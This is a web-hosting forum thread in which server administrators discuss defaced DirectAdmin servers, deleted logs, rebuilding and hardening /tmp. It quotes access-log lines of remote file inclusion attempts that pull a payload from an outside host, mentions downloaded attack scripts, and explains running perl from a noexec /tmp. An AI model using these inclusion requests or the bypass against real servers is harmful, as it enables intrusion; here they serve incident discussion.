Hello,

Yesterday morning, my server was hacked by the well known turkish hacker. As far as I can see using google, he only defaces websites by replacing the index with a page with turkish flag and a picture of Ataturk. This is what he has done to me anyway. Several websites have this page and he also replaced the DA interface after you log in.

The problem is, I can't restart any of the services now, most exit with vague errors. But, probably this is due to the fact that the complete /var/log directory is deleted. I haven't got a backup of these files and/or directory structure.

I have 2 questions.

1) Can anyone help me with the complete directory structure of the /var/log directory along with all permissions as they are default for a DA machine.
2) Where are the DA interface pages located ?

The most important question is off course, how did he get in .. nobody knows this according to google.

Anybody ?

All I need is a complete directory and file listing of the /var/log dir ..

Which OS Distribution?

However when a hacker breaks in and deletes your logs, he's obvioulsy got root access, so a rebuild from bare-metal is the best idea.

Jeff

Thanks Jeff, I gave it a fresh clean install.

Hello,

Yesterday morning, my server was hacked by the well known turkish hacker. As far as I can see using google, he only defaces websites by replacing the index with a page with turkish flag and a picture of Ataturk. This is what he has done to me anyway. Several websites have this page and he also replaced the DA interface after you log in.

The problem is, I can't restart any of the services now, most exit with vague errors. But, probably this is due to the fact that the complete /var/log directory is deleted. I haven't got a backup of these files and/or directory structure.

I have 2 questions.

1) Can anyone help me with the complete directory structure of the /var/log directory along with all permissions as they are default for a DA machine.
2) Where are the DA interface pages located ?

The most important question is off course, how did he get in .. nobody knows this according to google.

Ye, we have been getting hack attemps in our logs. This guys is from Hong Kong although its probably just a trojaned box. He is trying to install a file called M.txt into /tmp then i suspect his would try to execute it. But, this is only possible if your have no security on your box or you have not had your server locked down properly because if you did he would not be able to deface your websites.

Here are the relevant logs from his attempts;



Request: 12.196.192.16 - - [20/Mar/2007:12:43:37 -0400] "GET /gallery/components/com_rsgallery2/rsgallery.html.php?mosConfig_a
bsolute_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 403 0

GET /gallery/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1
.1

Request: 12.196.192.16 - - [20/Mar/2007:12:43:37 -0400] "GET /forum/components/com_performs/performs.php?mosConfig_absolute_pa
th=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 403 0

Request: 12.196.192.16 - - [20/Mar/2007:12:43:58 -0400] "GET /calendar/ws/login.php?includedir=http://203.198.68.236/~lisir/M.
txt?&/ HTTP/1.1" 403 0

and so on


Notice that he tried various attempts to install M.txt without success?

You can load his URL to see what his trying to do;

http://203.198.68.236/~lisir/M.txt :rolleyes:

Which OS Distribution?

However when a hacker breaks in and deletes your logs, he's obvioulsy got root access, so a rebuild from bare-metal is the best idea.

Jeff


Defacement of website does not mean root access. The box needs to be analysed to see if it was actually rooted or if the websites were simply defaced. We have cleaned tons of boxes where all the sites were defaced but no root was gained.

Defacement of website does not mean root access. The box needs to be analysed to see if it was actually rooted or if the websites were simply defaced. We have cleaned tons of boxes where all the sites were defaced but no root was gained.
Read again, pucky. If he deleted the entire /var/log path, he got root access.

Jeff

I need to read slower i think. :o

I have been hacked by the same hacker last night. he changed all the index files from my server. I manged to change the index files for my websites. I also changed my root password through ssh. But I cant log into the direct admin now. If I type my username password the hacker's page show up. What should I do now ?

Thanks

Get a full restore, have your DC mount the primary as the secondard then retrieve the data.

we also have defacement problem.. what is your software versions?

apache =
php =
kernel =

do you have idea how they can do this defacement ?

Are there anyway to recover log file?

Possibly, if you dismount the drive from the system as soon as you discover the problem, and then either know how to find and rebuild data on the partition type your drive uses, or you hire someone who does.

If you've left the drive in the system even a few hours chances are that much of the important data has been overwritten.

Jeff

hi Jeff
how can you guarantee the server will not be hacked again
'cz after reinstall it's still have the same bug.
Thank you.

how can you guarantee the server will not be hacked again

Nobody can guarantee that. And I didn't see where Jeff indicated it. Your server security is YOUR responsibility.

I think it is a bug in a gallery software you are using. I had that problem in the past with photopost. However, if you mount your /tmp directory with noexec, i believe the hacker will not be able to run his program.

However, if you mount your /tmp directory with noexec, i believe the hacker will not be able to run his program.


Depending on what program it is he may still be able to run it. If its a perl program for instance he can run it by prepending perl to it. EX. perl /tmp/script.pl or /usr/bin/perl /tmp/script.pl

So mounting /tmp with noexec will help but its not total protection.

i don't think you will be able to execute any perl scripts with apache unless they are in the cgi-bin dir.

i don't think you will be able to execute any perl scripts with apache unless they are in the cgi-bin dir.

Keep thinking that and you will be hacked. There are plenty of php exploits that allow an attacker to upload a perl script to either /tmp or /var/tmp and execute it. The perl script will run as the user apache since it was a php script that executed it. This not a theory. This is fact.

It's unlikely you were hacked again that quickly (though of course it's possible). It's more likely that you restored a backup of the hacked site.

Jeff

For anyone else this guy may have hit:

I found the script that was used to wreak the havoc on my server. The evidence in my case was located in /.bash_history, /etc/udev/pr.txt and /etc/udev/i.txt.

The history file shows the attacker downloaded the txt files from ddmalfa.cz and ran them. He also added a user named "help" before causing the system to crash.

If you are running suPhp and a hacker uploaded a perl script will the script run as the user or not?

Very interesting.

Can you also post the method of how he got the files on the box? And the question is indeed, how can you run the script as root.